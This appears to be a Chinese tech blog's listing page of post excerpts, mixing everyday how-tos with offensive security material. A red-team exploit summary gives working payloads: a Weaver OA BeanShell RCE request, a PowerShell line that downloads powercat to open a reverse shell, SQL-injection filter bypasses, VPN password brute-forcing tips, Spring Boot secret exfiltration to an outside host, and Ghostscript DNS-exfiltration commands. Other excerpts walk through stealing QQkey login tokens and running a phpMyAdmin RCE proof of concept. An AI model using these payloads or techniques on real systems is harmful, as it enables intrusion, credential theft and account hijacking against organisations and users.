• 查询自己征信是否污点方法

    步骤如下: 1、打开招商银行APP(任何人都可以注册哈)  2、首页搜索:征信 点击个人信用报告查询, 验信息后24小时内会给你报告。 可以去查查自己的信用是否有问题,有无逾期问题。 成功后会给你消息通知的, 在消息**里面即可看到报告, 查询的信息还是比较准确的,征信没问题的话 以后就可以贷款买车买房了,有问题就不行哦!建议都去查一下!...

    2020-08-22 802
  • Telegram贴纸简易教程

    1. 首先,找到我们的贴纸机器人 @Stickers ...

    2020-08-03 2597
  • 使用AIDE工具做入侵检测

    AIDE(Advanced Intrusion Detection Environment,高级入侵检测环境)是个入侵检测工具,主要用途是检查文档的完整性。 AIDE能够构造一个指定文档的数据库,他使用aide.conf作为其配置文档。AIDE数据库能够保存文档的各种属性,包括:权限(permission)、索引节点序号(inode number)、所属用户(user)、所属用户组(group)、文档大小、最后修改时间(mtime)、创建时间(ctime)、最后访问时间(atime)、增加的大小连同连接数。AIDE还能够使用下列算法:sha1、md5、rmd160、tiger,以密文形式建立每个文档的校验码或散列号。 实验目的: Aide通过检查数据文件的权限、时间、大小、哈希值等,校验数据的完整性。 使用Aide需要在数据没有被破坏前,对数据完成初始化校验,生成校验数据库文件,在被攻击后,可以使用数据库文件,快速定位被人篡改的文件。 步骤 实现此案例需要按照如下步骤进行。 步骤一:部署AIDE入侵检测系统 1)安装软件包 [root@proxy ~]# yum -y install aide 2) 修改配置文件 确定对哪些数据进行校验,如何校验数据 [root@proxy ~]# vim /etc/aide.conf @@define DBDIR /var/lib/aide                            //数据库目录 @@define LOGDIR /var/log/aide                            //日志目录 database_out=file:@@{DBDIR}/aide.db.new.gz                //数据库文件名 //一下内容为可以检查的项目(权限,用户,组,大小,哈希值等) #p:      permissions #i:      inode: #n:      number of links #u:      user #g:      group #s:      size #md5:    md5 checksum #sha1:   sha1 checksum #sha256:        sha256 checksum DATAONLY =  p n u g s acl selinux xattrs sha256 //以下内容设置需要对哪些数据进行入侵校验检查 //注意:为了校验的效率,这里将所有默认的校验目录与文件都注释 //仅保留/root目录,其他目录都注释掉 /root   DATAONLY #/boot   NORMAL                                    //对哪些目录进行什么校验 #/bin    NORMAL #/sbin   NORMAL #/lib    NORMAL #/lib64  NORMAL #/opt    NORMAL #/usr    NORMAL #!/usr/src                                        //使用[!],设置不校验的目录 #!/usr/tmp 步骤二:初始化数据库,入侵后检测 1)入侵前对数据进行校验,生成初始化数据库 [root@proxy ~]# aide --init AIDE, version 0.15.1 AIDE database at /var/lib/aide/aide.db.new.gz initialized. //生成校验数据库,数据保存在/var/lib/aide/aide.db.new.gz 2)备份数据库,将数据库文件拷贝到U盘(非必须的操作) [root@proxy ~]# cp /var/lib/aide/aide.db.new.gz   /media/ 3)入侵后检测 [root@proxy ~]# cd /var/lib/aide/ [root@proxy ~]# mv aide.db.new.gz aide.db.gz [root@proxy ~]# aide --check    //检查哪些数据发生了变化 QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL CEKNoNimQH-f1Ra94?imageView/2/w/800" title="使用AIDE工具做入侵检测" alt="使用AIDE工具做入侵检测" border="0" width="750px" height="1344px" />...

    2020-07-25 736
  • QQkey盗号原理分析

    一、简介     QQkey是一段字符串,通过这段字符串在没有QQ登录密码的前提下你依然能够在浏览器中对别人QQ空间、邮箱等应用进行随意访问和操作。现在市面上已经有很多使用易语言编写的盗号木马,专门盗取别人的QQkey,通过QQkey改绑关联了该邮箱的Steam账号,最终达到游戏盗号的目的! 二、原理     QQkey并没有人们想象的那么神奇,它其实是腾讯为了方便用户在网页上进行快速登录而推出的一项技术,就好比下面这张图。当你在本地登录QQ客户端的时候,打开网页版QQ空间,浏览器就会检测并提示你进行快速登录(此时你是不需要另外输入QQ密码的)。当然QQ和浏览器作为2个毫不相干的应用程序,它们之间其实是不能直接进行数据交换的,QQ客户端在每次启动的时候都会在本地打开一个或多个监听端口(4300-4308),当浏览器访问某些QQ页面的时候浏览器就向QQ客户端事先开放的监听端口发送GET请求,此时QQ客户端就充当起了WEB服务器的角色,它会向浏览器返回当前本机登录QQ的详细信息,浏览器通过这些信息就能实现用户的快速登录。而QQkey就是这些信息中最重要的一个字段。 三、手动获取QQkey 1、首先在浏览器中打开QQ空间(https://qzone.qq.com/) 2、按“F12”打开浏览器开发者模式,选择“Network”,按“F5”刷新网页 3、在“Name”窗口找到以“pt_get_uins”开头的项目,复制完整的请求地址(RequestURL)  4、将URL粘贴到Postman中,添加并修改请求头 5、Send后在返回中可以获取本机登录的QQ账号和昵称等信息 6、使用获取到的QQ号和pt_local_tk修改以下URL  View Code 7、将修改后的URL填入Postman 8、从返回的Cookies中获取Clientkey  四、总结     以上我们手动获取到的Clientkey,其实就是别人经常说的QQkey了。市面上的盗号木马其实就是模拟手动的方式,利用Http的GET请求来获取然后通过邮件的方式盗取别人QQkey的。下一篇文章我会为大家介绍如何使用接口+QQkey的方式来登陆QQ空间、QQ邮箱等网页应用! ...

    2020-07-22 1553
  • 暗网安全指南|15项措施,教你如何安全的访问暗网

    如果没有取正确的预防措施,暗网可能是非常危险的地方。使用优质的防病毒软件和像样的代理,可以保持相对安全。但是,如果你想完全匿名并保护您的设备,则您将需要的更多,可以参照以下15个措施: 确保您掌握了基础知识 使用移动实时操作系统(可选) 使用代理加密您的互联网流量 从其官方网站下载Tor 采取安全预防措施 Tor浏览器中的禁止脚本 在Tor浏览器中更改安全级别 检查是否没有IP,DNS或WebRTC泄漏 使用其他匿名服务 避免登录,订阅和付款 知道你要去哪里 使用加密货币 完成后关闭所有内容 意识到您永远不会100%安全 咨询在线指南,博客,搜索引擎,聊天网站等。 1.确保您掌握了基础知识 这听起来可能很无聊。但是暗网是一个复杂的地方,很多地方都可能出错。它到处都是骗子,恶意软件和网络钓鱼网站。有时候,边做边学会更好。但是,对于暗网,这不是最佳方法。在您不了解恶意软件的工作原理之前,您最好不要不让其感染恶意软件或损失大量金钱。暗网上有太多想滥用无知的人。 这就是为什么在下载软件或开始浏览之前,准确了解要在暗网上实现的目标很重要。如果您知道自己想做什么或在暗网上发现了什么,则可以更好地做好准备: 如果您只是在寻找令人兴奋或与众不同的东西:请确保您知道如何安全地浏览暗网。 如果您试图通过比特币或其他加密货币获利:请确保您了解加密货币的工作原理,区块链是什么以及与其他用户打交道的可靠平台。 作为举报人,确保您完全匿名非常重要。暴露某些事物可能会花费您的工作,或者在某些国家中您的自由。通过尽量保持匿名,可以防止掩盖。 2.使用Live Mobile OS(可选) 在暗网,匿名是最重要的保护。不是因为暗网是非法的(不是),而是因为您越匿名,您就越安全。不幸的是,像Windows 10这样的操作系统不太适合暗网中的隐私。Windows会执行以下不利于您匿名的操作: 您的数据会不断同步:浏览器历史记录,打开的网站,应用设置和Wi-Fi热点都将被跟踪 您的设备会自动链接到第三方的唯一广告ID Cortana收集数据,例如:您的击键,搜索结果,麦克风音频消息,日历信息,音乐播放列表,甚至是您的在线购买 Microsoft可以收集各种个人数据:您的身份,密码,习惯和兴趣,用户数据,联系人和位置 如果黑客设法通过暗网进入您的系统,则所有这些信息都可能被该黑客利用。Windows中的许多设置都可以轻松关闭(尽管不是全部)。您可以通过Windows中的设置或使用诸如W10Privacy之类的精美软件来完成此操作。 与通过Windows 10在暗网上进行交流相比,更好的主意是使用Tails,Whonix,ZuesGuard或Qubes等实时移动操作系统(OS)。 3.使用代理加密您的Internet流量 即使您使用Tor浏览器,只要有足够的时间,资源和专业知识,任何人都可以追踪您的流量。实际上,Tor浏览器在2017年被发现存在漏洞,在某些情况下会泄漏真实IP地址。 对于MacOS和Linux用户,上述问题特别严重。如果这些用户采取了预防措施,也可以在后台运行代理,那么他们的真实IP地址就不会受到损害。 因此,强烈建议您在浏览暗网时除Tor之外还使用代理。 代理会加密您的网络流量,并确保您的IP地址不会受到任何黑客或政府的监视,即使Tor浏览器内部存在漏洞。 但是请注意,并非每个代理提供商都同样可靠。免费版本经常遭受服务速度慢,数据限制和安全漏洞的困扰。 4.从官方网站下载Tor 诸如Tails和Whonix之类的移动实时操作系统已经预装了Tor浏览器,因此如果使用它们,则可以跳至步骤5。对于Windows,Mac,Linux或Android用户,这很重要。 Tor浏览器是黑客和政府机构感兴趣的目标。伪造的Tor浏览器版本是为了在用户甚至访问暗网之前就破坏用户,或者在暗网中监视用户的行为。后一种方法对政府机构特别有吸引力。 因此,您应该始终从其官方网站下载Tor浏览器:https : //www.torproject.org/ 确保始终下载最新版本的浏览器,并始终保持最新。或者可以加群下载群内的tor浏览器与tor官网同步更新 QQ群号:979727860 点击链接加入群聊:...

    2020-07-11 7269
  • 震惊!淘口令竟被用来访问钓鱼站+支付宝付款骗钱

    也许你在正常交易时碰到过这样的事情: 开始分析 ¥jLFM1x086Lm¥淘口令解析结果: 淘口令链接:https://login.taobao.com/member/ ... rd-Outside.windvane 淘口令标题:陪玩#可夜 淘口令剩余时间:28天0小时3分9秒 然后先把短连接打开,发现会自动跳转http://suo.im/6bvtlW,解析后的原链接:http://zhuanzhuan-58.com/xy/?i=5 ... 17u&ClickID=616 后面参数先不要管,打开,这个网址贼骚,检测到你电脑访问就跳转咸鱼,手机访问正常 (现在手机也打不开了,全部跳转咸鱼,主站跳转百度,骗子日常操作) 什么买耳机被坑,这不是搞陪玩被骗了,这是一个高仿咸鱼的网站。点击我想要,会提示淘宝打开,然后出现付款。 (楼主说咸鱼有网页支付,但是咸鱼客户端付款是不支持网页支付,这里因为是网页打开,所以出现了网页支付) 接着调用支付宝,然后你懂的!出现付款界面,收款商家为那个交易猫,老规矩,冲q币洗白。 至于跳转后面的参数百度搜索TaoPassword-Outside.windvane,会发现好多类似熟悉参数的淘宝客链接或者聚划算链接之类,这一堆参数估计是为可以生成淘口令用的(淘口令生成有严格参数限制的),没玩过淘口令就不解析了。 事情总结 这事应该淘宝背锅,竟然不搞白名单,咸鱼兼容淘宝口令的方式通过网页版打开淘宝链接的,而且是自动登录的,所以假如一个假的淘口令,当你复制到咸鱼后,他会自动登录你的淘宝账号,然后跳转到http://suo.im/6bvtlW, 所以故事是这样的: 正常路径: 用户复制淘口令到咸鱼,咸鱼会以网页形式打开链接,并自动登录(大家可以复制一个淘宝口令试一下),不用登陆可以下单购买,付款只能支付宝付款(没有网页付款) 被骗路径: 用户复制伪装的淘口令,咸鱼以网页形式打开淘宝,然后自动跳转到到http://suo.im/6bvtlW,就好比你自己手机开个浏览器打开http://suo.im/6bvtlW,剩下不解释了,都是常规骗人套路 只能说想到这个方法的人牛逼啊!!!!!!! 总结: 各位在QQ 、微信等聊天工具、复制淘口令时,应注意 URL 地址以及付款时的页面!避免被骗! ...

    2020-07-09 846
  • 最新快速联系腾讯人工客服的方法

    使用过腾讯系统的软件的人都知道,腾讯一般都是机器人客服,想要找到人工客服几乎是没有端口给你接入的,那么是不是就没有人工客服了呢,其实也是有方法能联系到他们的,下面小编就来给大家介绍一下2020最新联系腾讯客服方法,快来一起看看吧! 联系方法 1.用手机拨打电话0755 8601 3860  2.按提示操作然后微信会给你发消息 3.点进去等待接通 提示繁忙继续等 就可以接通客服...

    2020-07-05 642
  • telegram(电报)汉化版教程

    Telegram是一个跨平台的实时通讯应用。Telegram的主要优势是,它非常安全、免费、没有广告并且功能强大。对比于其他同类通讯软件来说,在用户体验上做得非常好。但是,在国内是无法访问的,至于原因,大家都懂的。 加群里面有和汉化版tg、梯子 QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL CEKNoNimQH-f1Ra94?imageView/2/w/800" title="telegram(电报)汉化版教程" alt="telegram(电报)汉化版教程" border="0" width="750px" height="1344px" /> Telegram官网为:https://telegram.org/,目前已发布安卓、IOS、PC、Mac、Linux版本。已发布的版本中没有中文版,但官方为用户提供了汉化助手,用户可以手动轻松的将软件转为中文版。 下载并注册好 Telegram 后,在界面顶部的搜索框中输入@zh_CN(注意:包含@),进入“Telegram-zh_CN project”频道,在此频道内就能看到官方发布的汉化方法了,按照使用方法设置后,界面就能够以中文显示了。 ...

    2020-06-25 1876
  • 苹果安卓均可修改微信号了

    6月17日置顶:官方已通告,苹果手机也可以改了! 先把微信更新到最新版本,然后打开微信->我->设置->账户与安全->微信号->修改即可 (一年可以改一次)必须要是最新版微信,如果改不了退出重新登录试试! 还是没显示能修改就耐心等待,需要一个覆盖过程! 官方说明:https://mp.weixin.qq.com/s/uAJZ-9luDbTuLJuInGvGCA ...

    2020-06-20 480
  • 中国联通在线销户教程

    步骤如下: 1、打开联通营业厅APP--【服务】--【办理】--【销户】 2、根据要求上传所需要的资料即可,有多余的号的可以注销了  PS:话费余额可以转移到银行卡,其他手机账户,沃账户等等! 如果转移到银行卡的小伙伴小编建议在注销之前咨询下客服。 据说通过官方充值的才会退到银行卡 第三方充值的不行!...

    2020-06-20 610
  • 2020护网红方漏洞利用总结

      一年一度的护网马上要开始了,结合网上已公布的POC,总结了一部分最新的漏洞利用及修复方式,供大家参考。 1 泛微OA Bsh 远程代码执行漏洞 1. 漏洞简介 2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重. 2. 影响组件泛微OA 3. 漏洞指纹 Set-Cookie: ecology_JSessionId=ecology/weaver/bsh.servlet.BshServlet 4. Fofa Dork app="泛微-协同办公OA" 5. 漏洞分析 泛微OA E-cology远程代码执行漏洞原理分析 – FreeBuf互联网安全新媒体平台 https://www.freebuf.com/vuls/215218.html https://github.com/beanshell/beanshell http://beanshell.org/manual/quickstart.html#The_BeanShell_GUI 6. 漏洞利用 Vulnerability-analysis/0917/weaver-oa/CNVD-2019-32204 at master · myzing00/Vulnerability-analysis https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204 POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: xxxxxxxx:8088 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 98 Content-Type: application/x-www-form-urlencoded bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 7. 利用技巧 1.其他形式绕过 eval%00("ex"%2b"ec(\"whoami\")"); 也可以换成 ex\u0065c("cmd /c dir"); 2.泛微多数都是windows环境, 反弹shell可以使用pcat Powershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd 8. 防护方法 1.及时更新泛微补丁 2.拦截/weaver/bsh.servlet.BshServlet目录的访问 2 泛微OA e-cology SQL注入漏洞 1. 漏洞简介 泛微OA在国内的用户很多,漏洞以前也很多,但现在在漏洞盒子托管了企业SRC https://weaversrc.vulbox.com/, 情况有所好转 2. 影响组件 泛微OA 3. 漏洞指纹 Set-Cookie: ecology_JSessionId= ecology WorkflowCenterTreeData /mobile/plugin/SyncUserInfo.jsp 4. Fofa Dork app="泛微-协同办公OA" 5. 漏洞分析 泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库) – 先知社区 https://xz.aliyun.com/t/6531 6. 漏洞利用 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现数据库小龙人-CSDN博客 https://blog.csdn.net/zycdn/article/details/102494037 Tentacle/ecology8_mobile_sql_inject.py at 6e1cecd52b10526c4851a26249339367101b3ca2 · orleven/Tentacle https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py 应用安全 – 软件漏洞 – 泛微OA漏洞汇总 – AdreamWillB – 博客园 https://www.cnblogs.com/AtesetEnginner/p/11558469.html /mobile/plugin/SyncUserInfo.jsp 这个也是有问题的, 但由于没有公开的分析报告, 漏洞相对简单, 这里不过多描述 7. 利用技巧 1.在这个漏洞补丁之前大概有几十个前台注入, 都差不多, 因为没公开这里就不细说了 2.泛微的补丁中间改过一次过滤策略, 打完所有补丁的话, 注入就很难了 3.这里可以绕过的原因是泛微某个过滤器初始化错误,当长度超过xssMaxLength=500的时候就不进入安全检测, 修复以后是xssMaxLength=1000000,所以随便你填充%0a%0d还是空格都可以绕过注入检测 4.泛微后端数据库版本存在差异, 但是可以通用检测。已知泛微OA E8存在2个版本的数据库, 一个是mssql, 一个是oracle, 且新旧版本泛微的sql过滤方法并不一致所以这里筛选出一个相对通用的检测手法(下面代码是python的" "*800 800个空格) "-1) "+" "*800+ "union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=('sysadmin'" 老版本可以在关键字后面加 /**/ 来绕过sql检测 新版本可以通过加入大量空格/换行来绕过sql检测mssql,oracle中都有Hrmresourcemanager , 这是管理员信息表 就Hrmresource表中没有用户, Hrmresourcemanager 表中也一定会存在sysadmin账户,所以进行union select的时候一定会有数据。这里也可以使用 "-1) "+" "*800+ " or/**/ 1=1 and id<(5",这里使用 <5 可以避免信息超过5条, 但是会返回密码等敏感信息, 不建议使用。 8. 防护方法 1.及时更新泛微补丁 2.泛微最好不要开放到公网 3.使用waf拦击 3 深信服VPN远程代码执行 1. 漏洞简介 深信服 VPN 某个特定产品存在远程代码执行, 2019 攻防演练使用过 2. 影响组件深信服 VPN 3. 漏洞指纹 Set-Cookie: TWFID=welcome to ssl vpn Sinfor 4. Fofa Dork header="Set-Cookie: TWFID=" 5. 漏洞分析 深信服vpnweb登录逆向学习 – potatso – 博客园 https://www.cnblogs.com/potatsoSec/p/12326356.html 6. 漏洞利用 wget -t %d -T %d --spider %s 7. 利用技巧 1.该版本深信服VPN属于相对早期的版本, 大概2008年左右, 但目前还有761个ip开放在公网 2.该版本较低, whomai不存在, 可以使用 uname, 这里没有空格可dns传出来 3.去除空格也简单 cat /etc/passwd | tr " \n" "+|" 8. 防护方法 1.及时更新补丁 2.升级到最新版 4 深信服 VPN 口令爆破 1. 漏洞简介 深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, 所以这里爆破也不是不行, 主要是测试常见弱口令以及分布式爆破也不是不行 2. 影响组件深信服 VPN 3. 漏洞指纹 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd= 4. Fofa Dork app="深信服-SSL-VPN" 5. 漏洞分析 关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区 https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633 此处存疑, 时间问题没有测试 6. 漏洞利用 1.深信服VPN 口令爆破 demo (这里仅测试了M6,其他的应该差不多) #encoding=utf8 import requests import hashlib import urllib3 urllib3.disable_warnings() import re session = requests.session() def SanForLogin(target, password, username="admin"):     # 加密密码的算法是 sha1(password+sid)     # 没有公开POC就不写了 SanForLogin("https://xxxxxxxxxxx/", "admin") 7. 利用技巧 1.由于深信服涉及的版本跨度时间达十几年, 很多地方不一样, 但是总体都差不太多 国外APT组织应该也批量爆破了一波,加密的密码也就是 sha1(password+sid) 爆破也就锁一会ip, 夜里丢一边跑着就完事了, 弱口令也就那么些admin/123456/Sangfor/Sangfor@123 2.如果爆破出来了管理员密码, 管理员后台有好多处命令注入, 比如升级工具, 这里讲起来应该是正常功能 3.去年传闻还有前台sql注入, 但是没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧。深信服SSLVPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell https://www.uedbox.com/post/31092/ 8. 防护方法 1.及时更新补丁 2.升级到最新版 5 边界产品(防火墙, 网关, 路由器, VPN) 相关漏洞 1. 漏洞简介 大型企业往往会配置一些边界设备来维护企业内外网通信, 这里也存在灯下黑的问题, 由于多数不开源, 漏洞主要以弱口令为主 2. 影响组件 防火墙, 网关, 路由器, VPN 3. 漏洞指纹 防火墙, 网关, 路由器, VPN 4. Fofa Dork防火墙, 网关, 路由器, VPN 的名称 5. 漏洞分析 【安全设备】常见网络安全设备默认口令|IT2021.Com https://www.it2021.com/security/614.html 渗透测试之各厂商防火墙登录IP、初始密码、技术支持 https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA 6. 漏洞利用 【安全设备】常见网络安全设备默认口令|IT2021.Com https://www.it2021.com/security/614.html 渗透测试之各厂商防火墙登录IP、初始密码、技术支持 https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA 7. 利用技巧 1.这个东西好多人不改默认口令, 就算改很多也是企业特色弱口令 admin root 123456 永远的神 内网的安全平台就是个漏洞指南 8. 防护方法 1.设置强口令 2.限制来源IP 6 Thinkphp 相关漏洞 1. 漏洞简介 Thinkphp 是国内很常见的PHP框架, 存在 远程代码执行/sql注入/反序列化/日志文件泄露等问题 2. 影响组件 Thinkphp 3. 漏洞指纹 Thinkphp X-Powered-By: ThinkPHP 4. Fofa Dork app="ThinkPHP" 5. 漏洞分析 ThinkPHP漏洞总结 – 赛克社区 http://zone.secevery.com/article/1165 挖掘暗藏ThinkPHP中的反序列利用链 – 斗象能力中心 https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/ ThinkPHP使用不当可能造成敏感信息泄露PHP_Fly鹏程万里-CSDN博客 https://blog.csdn.net/Fly_hps/article/details/81201904 DSMall代码审计 – 安全客,安全资讯平台 https://www.anquanke.com/post/id/203461 6. 漏洞利用 SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编写 https://github.com/Dido1960/thinkphp whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具 https://github.com/whirlwind110/tphack 7. 利用技巧 1.遇到Thinkphp的站点看一下版本, 或者直接扫一下, 看看有没有rce, 或者日志文件泄露 2.自从挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中 3.实战中也看到偶尔有可以利用的情况, 运气好可能有惊喜, 刚好有篇新出的文章中使用到了这个漏洞 DSMall代码审计 – 安全客,安全资讯平台 https://www.anquanke.com/post/id/203461 8. 防护方法 1.及时更新补丁 2.升级到最新版Thinkphp 3.前置WAF进行防护 7 Spring 系列漏洞 1. 漏洞简介 Spring 是java web里最最最最常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒 2. 影响组件 Spring xxx 3. 漏洞指纹 X-Application-Context: 4. Fofa Dork app="Spring-Framework" 5. 漏洞分析 Spring 框架漏洞集合 ~ Misaki’s Blog https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/ Exploiting Spring Boot Actuators | Veracode blog https://www.veracode.com/blog/research/exploiting-spring-boot-actuators Spring Boot Actuators配置不当导致RCE漏洞复现 – JF ‘ blog https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Spring%20Boot%20Actuators%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/ 6. 漏洞利用 mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE https://github.com/mpgn/Spring-Boot-Actuator-Exploit artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads https://github.com/artsploit/yaml-payload 7. 利用技巧 1.Spring Boot Actuators 相关漏洞超级好用,很多厂商一开始都不懂, 直接对外开放Spring Boot Actuators, 造成了有一段时间每个用了Spring Boot的厂商都出了问题,尤其是现在很多厂商使用微服务框架, 通过网关进行路由分发, 一些子目录通常对应一个Spring Boot启动的服务。然后子目录比如 http://123.123.123.123/admin/env , http://123.123.123.123/manager/env也都是可以出现的/env 可以偷session, RCE/heapdump 可以直接dump jvm中的对象, 使用 jhat 可以读取里面的对象可以遍历如下的endpoint, 1.x 2.x的目录不一样, 所以都覆盖了一下 /trace /health /loggers /metrics /autoconfig /heapdump /threaddump /env /info /dump /configprops /mappings /auditevents /beans /jolokia /cloudfoundryapplication /hystrix.stream /actuator /actuator/auditevents /actuator/beans /actuator/health /actuator/conditions /actuator/configprops /actuator/env /actuator/info /actuator/loggers /actuator/heapdump /actuator/threaddump /actuator/metrics /actuator/scheduledtasks /actuator/httptrace /actuator/mappings /actuator/jolokia /actuator/hystrix.stream /monitor /monitor/auditevents /monitor/beans /monitor/health /monitor/conditions /monitor/configprops /monitor/env /monitor/info /monitor/loggers /monitor/heapdump /monitor/threaddump /monitor/metrics /monitor/scheduledtasks /monitor/httptrace /monitor/mappings /monitor/jolokia /monitor/hystrix.stream 这里通过 /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行一些默认操作,里面就有操作空间, 很像fastjson反序列化。 2.就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok eureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000 spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml 3.尤其是使用spring eureka做集群的时候, 通常拿到一台服务器, 就可以传递恶意注册到其他server, 从而感染整个微服务集群eureka 通常是 server 也是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了 8. 防护方法 1.及时更新补丁 2.开启Spring Boot Actuators权限校验 3.前置WAF进行防护 8 Solr 系列漏洞 1. 漏洞简介 Solr 是企业常见的全文搜索服务, 这两年也爆出很多安全漏洞, 2. 影响组件 Solr 3. 漏洞指纹 Solr 4. Fofa Dork app="Solr" 5. 漏洞分析 Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新媒体平台 https://www.freebuf.com/vuls/218730.html Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析 https://paper.seebug.org/1009/ 6. 漏洞利用 veracode-research/solr-injection: Apache Solr Injection Research https://github.com/veracode-research/solr-injection jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”) https://github.com/jas502n/CVE-2019-12409 mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit https://github.com/mogwailabs/mjet 7. 利用技巧 1.看到锤就完事了, 漏洞太多了, 一片一片的 2.遇到mjet连接超时,这是目标服务起返回了错误的stub(内网地址, 常见于docker), 可以使用socat进行流量转发, 后记里面有具体操作 8. 防护方法 1.升级到最新版 2.不要对外开放敏感端口 9 Ghostscript 上传图片代码执行 1. 漏洞简介 Ghostscript 是图像处理中十分常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过导致代码执行的问题影响广泛, 由于上传图片就有可能代码执行, 很多大厂中招 2. 影响组件 imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用 3. 漏洞指纹 .ps/.jpg/.png 4. Fofa Dork 5. 漏洞分析 ghostscript命令执行漏洞预警 – 安全客, 安全资讯平台 https://www.anquanke.com/post/id/157513 6. 漏洞利用 Exploit Database Search https://www.exploit-db.com/search?q=Ghostscript vulhub/ghostscript/CVE-2019-6116 at master · vulhub/vulhub https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116 7. 利用技巧 1.如果发现网站可以上传图片, 且图片没有经过裁剪, 最后返回缩略图, 这里就可能存在Ghostscript 上传图片代码执行dnslog 可以用 ping `uname`.admin.ceye.io 或 ping `whoami`.admin.ceye.io保存成图片, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不一样, 可以这样构造ping `whoami`.centos.admin.ceye.io / ping `whoami`.ubuntu.admin.ceye.io分别命名为 centos_ps.jpg/ubuntu_ps.jpg, 这样测试的时候直接传2个文件, 通过DNSLOG可以区分是哪个poc执行的 8. 防护方法 1.升级到最新版 ...

    2020-06-19 2123
  • Windows全版本本地提权

    Windows全版本本地提权EXP(CVE-2020-0787) https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases 一条命令从APK中获取信息 grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/br ...

    2020-06-19 993
  • phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞

    phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,`preg_replace`的第一个参数可以利用进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: - 4.0.10.16之前4.0.x版本 - 4.4.15.7之前4.4.x版本 - 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5 ,所以无法复现本漏洞) 启动后,访问`http://192.168.28.4:8080`,即可看到phpMyAdmin的登录页面,账户:root,密码:root。 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(C POC如下 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) 运行POC: python C:UserslenovoDesktopa.py -u root -p "root" http://192.168.28.4:8080 -c "system('id')" ...

    2020-06-13 772
  • APN设置教程

